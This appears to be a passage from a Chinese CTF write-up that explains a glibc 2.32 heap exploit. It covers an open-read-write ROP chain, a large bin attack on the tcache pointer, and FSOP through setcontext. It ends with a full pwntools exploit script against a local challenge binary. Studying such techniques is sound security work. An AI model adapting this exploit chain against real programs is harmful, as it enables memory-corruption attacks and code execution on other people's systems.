Size: 0x1250 (with flag bits: 0x1251)                                                                                                                                                                                             
fd: 0x7f8fbdf25230                                                                                                                                                                                                                
bk: 0x7f8fbdf25230                                                                                                                                                                                                                
fd_nextsize: 0x5648fdbf8140                                                                                                                                                                                                       
bk_nextsize: 0x5648fdbf8140                                                                                                                                                                                                       
                                                                                                                                                                                                                                  
Allocated chunk                                                                                                                                                                                                                   
Addr: 0x5648fdbf9390                                                                                                                                                                                                              
Size: 0x210 (with flag bits: 0x210)

Allocated chunk | PREV_INUSE
Addr: 0x5648fdbf95a0
Size: 0x1610 (with flag bits: 0x1611)

Top chunk | PREV_INUSE
Addr: 0x5648fdbfabb0

free(0)：把之前的 0 号位空出来，用来存放接下来的载荷。
我们接下来要把 orw 链写进堆里。但系统调用 open(filename, 0) 需要一个指向文件名的字符串指针。
0x8e0： 0x290 + 0x20 + 0x420 + 0x200 + 0x10(chunk0 头)= 0x8e0
0x100：这是我们在 payload 里留出的填充空间。
我们之后把 "flag" 字符串刚好放在 heap_base + 0x8e0 + 0x100 的位置，这样 open 就能找到它

Open (“flag”, 0)

1	orw = p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(0) + p64(sys_open)

pop rdi -> flag_addr：把刚才算好的字符串地址给 RDI（第一个参数）。
pop rsi -> 0：把 0 给 RSI 。
调用 open：系统会打开 flag 文件。在 Linux 中，标准输入是 0，标准输出是 1，标准错误是 2。所以我们新打开的这个 flag 文件，文件描述符 fd 是 3。

Read (3, buffer, size)

1	orw += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(flag_addr + 0x100) + p64(pop_rdx_r12) + p64(0x40)*2 + p64(sys_read)

pop rdi -> 3：指定读取文件描述符 3（刚打开的 flag 文件）。
pop rsi -> flag_addr + 0x100：把读出来的数据存在 flag_addr + 0x100。
pop rdx -> 0x40：告诉系统读 0x40 个字节

Write (1, buffer, size)

1	orw += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(flag_addr + 0x100) + p64(pop_rdx_r12) + p64(0x40)*2 + p64(sys_write)

pop rdi -> 1：指定写到文件描述符 1（也就是屏幕 stdout）。
pop rsi -> flag_addr + 0x100：刚才把数据读到哪了，现在就从哪里取。
pop rdx -> 0x40：打印 64 字节。
调用 write，Flag 就会喷在屏幕上！

创建 chunk0 写入 ORW

1
2
3

orw = orw.ljust(0x100, b'a')
orw += b'flag\x00\x00\x00\x00' # 写入目标文件名
add(0x440, orw) #0

我们把flag 字符串会被放在偏移为 0x100 的位置。前面的用 ljust 进行填充，拼接上真正的文件名 b'flag\x00'
用 add(0x440, orw)，重新创建Chunk 0，此时 chunk0 中写入了 ORW

Large Bin Attack

Large Bin Attack 的核心原理：当向 Large Bin 插入一个新 chunk 时，如果没有进行合法性检查，我们可以通过篡改已有 chunk 的 bk_nextsize 指针，实现任意地址写一个已知堆地址。

free(5) # 放入 unsorted bin 0x430
free(4) # 放入 unsorted bin 0x210

# 利用堆覆盖篡改 chunk5 (未来进入 large bin) 的指针
# p64(tls_struct - 0x20) 是目标地址。写入后，目标地址 + 0x20 的位置会被写入当前堆块的地址
payload = b'a'*0x208 + p64(0x431) + p64(libc_base + 0x1e3ff0)*2 + p64(heap_base + 0x1350)
payload += p64(tls_struct - 0x20)

b'a'*0x208：填充掉原 Chunk 4 的空间。
p64(0x431)：伪造 Chunk 5 的 Size（0x430 + P位），绕过 glibc 的检查。
p64(libc_base + 0x1e3ff0)*2：伪造 fd 和 bk。这是为了让 Unsorted Bin 的链表不断裂，欺骗 glibc 的基本完整性检查。
p64(heap_base + 0x1350)：伪造 fd_nextsize。
p64(tls_struct - 0x20)：伪造 bk_nextsize。

1
2
3

add(0x1240, payload)
free(11)
add(0x500) # 分配操作触发 glibc 遍历 unsorted bin，将其推入 Large bin，此时触发利用，将堆指针写入 tls_struct！

free(11) 只是为了微调一下链表顺序。add(0x500)

它去 Unsorted Bin 里找，发现里面的块（Chunk 4 和被篡改的 Chunk 5）都不够大。
按照机制，glibc 必须清空 Unsorted Bin，把这些不合格的块“按大小分类”扔进它们该去的桶里。
Chunk 5（大小 0x430）被回收到 Large Bin 当中

1
2
3

// victim 是当前正在被插入的块
// fwd 是已经在链表里的块
victim->bk_nextsize->fd_nextsize = victim;

(tls_struct - 0x20) -> fd_nextsize = victim ==> (tls_struct - 0x20) + 0x20 = victim

结果： 当前线程的 tcache_perthread_struct 指针被改写，指向了我们的堆块。接下来的 tcache 分配都会从我们伪造的结构体里拿。

伪造结构与触发执行 FSOP

# 修复刚才破坏的堆块环境，防止后续 malloc 崩溃
payload = b'a'*0x208 + p64(0x431) + p64(libc_base + 0x1e3ff0)*2 + p64(heap_base + 0x1350)*2
add(0x1240, payload)

# 伪造 Tcache 结构体 / _IO_FILE 结构体
fake_tcache = b'\x07\x00' * 0x35 # 填满 tcache counts
"""
这里把53个tcachebin全部填满，这是防止在触发__mallco_assert报错之前程序崩溃
"""

# 巧妙复用内存：这块内存既被当做 tcache 结构，又被当做报错时刷新的 _IO_FILE 结构
fake_tcache = fake_tcache.ljust(0xe8, b'\x00') + p64(IO_file_jumps + 0x60) 
fake_tcache = fake_tcache.ljust(0x168, b'\x00') + p64(IO_helper_jumps + 0xa0)
fake_tcache += p64(heap_base + 0x46f0) # 篡改 top_chunk 指针，制造异常

add(0x420, fake_tcache)
add(0x100, p64(sys_setcontext + 61)) # 设置 vtable 劫持目标为 setcontext+61 (用于从 RDX 恢复寄存器)
add(0x200, p64(heap_base + 0x8e0) + p64(ret)) # 配合 setcontext 提供上下文指针
add(0x210, p64(0x999))

# 请求超过 top chunk size 的大内存触发sysmalloc
add(0x1000)

1	fake_tcache = fake_tcache.ljust(0xe8, b'\x00') + p64(IO_file_jumps + 0x60)

ljust(0xe8, b'\x00')：0xe8 + 0x10 = 0xf8 在 entries 数组里的第15个元素
p64(IO_file_jumps + 0x60)：在这里写入了 _IO_file_sync 的指针地址，可以绕过 vtable 检查
当我们 add(0x100, p64(sys_setcontext + 61)) 时，0x110 大小的堆块，对应的索引正好是 15
(0x110 - 0x20) / 0x10 = 15
那么p64(sys_setcontext + 61) 就会覆盖 _IO_file_sync

1	fake_tcache = fake_tcache.ljust(0x168, b'\x00') + p64(IO_helper_jumps + 0xa0)

把 setcontext 即将读取上下文的地址（RDX + 0xa0），塞进了 Tcache 的 31号桶，对应分配 0x200 大小的内存。随后脚本调用 add(0x200)，拿到了这个内存块。然后往里面写入了 heap_base + 0x8e0（ORW 链的地址）和 ret 。当 setcontext 被触发时，就会将 RSP指向你的 ORW 链

1	fake_tcache += p64(heap_base + 0x46f0) # 篡改 top_chunk 指针，制造异常

这行代码落在了 Tcache 的 32号桶，对应分配 0x210 大小的内存。然后将当前堆的 Top Chunk 的真实地址 heap_base + 0x46f0 写了进去。随后调用 add(0x210)，glibc 就把 Top Chunk 的头部当成空闲块分配。之后将 top_chunk 修改为 0x999 导致原本合法的 Top Chunk Size 被强行覆盖成了 0x999 这个不合法的大小。

add(0x1000)

程序试图分配 0x1000，发现空间不够，调用 sysmalloc。
sysmalloc 检查 top_chunk被篡改，发现大小异常，触发 __malloc_assert
assert 失败会导致程序中止并打印错误，这需要调用 IO 相关的函数（刷新 stderr 流）。
由于指针已被劫持，程序会使用我们在堆上伪造的 _IO_FILE 结构。
通过伪造的 vtable (IO_helper_jumps)，程序最终将执行流交给了 setcontext + 61。
setcontext 根据我们布置的堆内存恢复寄存器（包括将栈指针 RSP 指向堆上的 ORW 链）。
程序从堆上 “Return”，顺着执行 Open -> Read -> Write，将 Flag 输出到终端

总 EXP：

from pwn import *

libc = ELF("/home/kali/Desktop/glibc-all-in-one/libs/2.32-0ubuntu3_amd64/libc-2.32.so")

io = process("./main")
# context.terminal=["tmux","splitw","-h"]
elf = ELF('./main')
context(arch = elf.arch, log_level = 'debug', os = 'linux')

def add(size, msg=b'\x00'):
    io.sendlineafter(b">> ", b'1')
    io.sendlineafter(b"(: Size: ", str(size).encode())
    io.sendafter(b"(: Content: ", msg)

def edit(index, msg):
    io.sendlineafter(b">> ", b'2')
    io.sendlineafter(b"Index: ", str(index).encode())
    io.sendafter(b"Content: ", msg)

def free(index):
    io.sendlineafter(b">> ", b'3')
    io.sendlineafter(b"Index: ", str(index).encode())

def show(index):
    io.sendlineafter(b">> ", b'4')
    io.sendlineafter(b"Index: ", str(index).encode())

add(0x418) #0
add(0x1f8) #1
add(0x428) #2
add(0x438) #3
add(0x208) #4
add(0x428) #5
add(0x208) #6

free(0)   
free(3)
free(5)

free(2) 

# gdb.attach(io)
# pause()

payload = b'a'*0x428 + p64(0xc91)
add(0x440, payload) #0
# gdb.attach(io)
# pause()

add(0x418)
add(0x418)
add(0x428) 
# gdb.attach(io)
# pause()

free(3)
free(2)
# gdb.attach(io)
# pause()

add(0x418, b'a'*9) #2
add(0x418) #3
free(3)
free(5)
add(0x9f8) #3
add(0x428, b'a') #5
# gdb.attach(io)

payload = b'a'*0x200 + p64(0xc90) + b'\x00'
edit(6, payload)
# gdb.attach(io)

add(0x418)
add(0x208) 

free(3)
# gdb.attach(io)
payload = p64(0) * 3 + p64(0x421)
add(0x430, payload)
# gdb.attach(io)

add(0x1600)
# gdb.attach(io)
show(4)

libc_base = u64(io.recv(6).ljust(8, b'\x00')) - 0x6a0 - libc.sym["__malloc_hook"]
log.success(f"libc_base: {hex(libc_base)}")

show(5)
heap_base = u64(io.recv(6).ljust(8, b'\x00')) - 0x2b0
log.success(f"heap_base: {hex(heap_base)}")
gdb.attach(io)

tls_struct = libc_base + 0x1eb578
log.success(f"tls_struct: {hex(tls_struct)}")

sys_open = libc_base + libc.sym["open"]
sys_read = libc_base + libc.sym["read"]
sys_write = libc_base + libc.sym["write"]
sys_setcontext = libc_base + libc.sym["setcontext"]

pop_rdi = libc_base + 0x000000000002858f #: pop rdi; ret; 
pop_rsi = libc_base + 0x000000000002ac3f #: pop rsi; ret;
pop_rdx_r12 = libc_base + 0x0000000000114161 #: pop rdx; pop r12; ret;

IO_file_jumps = libc_base + 0x1e54c0

IO_helper_jumps = libc_base + 0x1e48c0
log.success(f"IO_helper_jumps: {hex(IO_helper_jumps)}")
ret = libc_base + 0x0000000000026699 #: ret; 

payload = b'b'*0x208 + p64(0x431) + b'b'*0x428 + p64(0x211) + b'a'*0x208 + p64(0xa01)
add(0x1240, payload)

free(0) # orw_addr
flag_addr = heap_base + 0x8e0 + 0x100

# ORW
orw = p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(0) + p64(sys_open)
orw += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(flag_addr + 0x100) + p64(pop_rdx_r12) + p64(0x40)*2 + p64(sys_read)
orw += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(flag_addr + 0x100) + p64(pop_rdx_r12) + p64(0x40)*2 + p64(sys_write)
orw = orw.ljust(0x100, b'a')
orw += b'flag\x00\x00\x00\x00'

add(0x440, orw) #0
add(0x418) #11
add(0x208) #12

free(5) # unlink big chunk
free(4) # large_bin attack chunk 
# chunk5 ----> largebin

payload = b'a'*0x208 + p64(0x431) + p64(libc_base + 0x1e3ff0)*2 + p64(heap_base + 0x1350)
payload += p64(tls_struct - 0x20)

add(0x1240, payload)
free(11)
add(0x500) # wancheng large_bin attack

add(0x410) #11
free(4)

payload = b'a'*0x208 + p64(0x431) + p64(libc_base + 0x1e3ff0)*2 + p64(heap_base + 0x1350)*2
add(0x1240, payload)


# 伪造的 tcache 结构体
fake_tcache = b'\x07\x00' * 0x35
fake_tcache = fake_tcache.ljust(0xe8, b'\x00') + p64(IO_file_jumps + 0x60)
fake_tcache = fake_tcache.ljust(0x168, b'\x00') + p64(IO_helper_jumps + 0xa0)
fake_tcache += p64(heap_base + 0x46f0) # top_chunk

add(0x420, fake_tcache)
add(0x100, p64(sys_setcontext + 61))
add(0x200, p64(heap_base + 0x8e0) + p64(ret))
add(0x210, p64(0x999))
# gdb.attach(io)
add(0x1000)
#gdb.attach(io)
io.interactive()

更新: 2026-04-27 16:32:10
原文: https://www.yuque.com/idcm/wnemg9/atp1v4un4fw5rnqp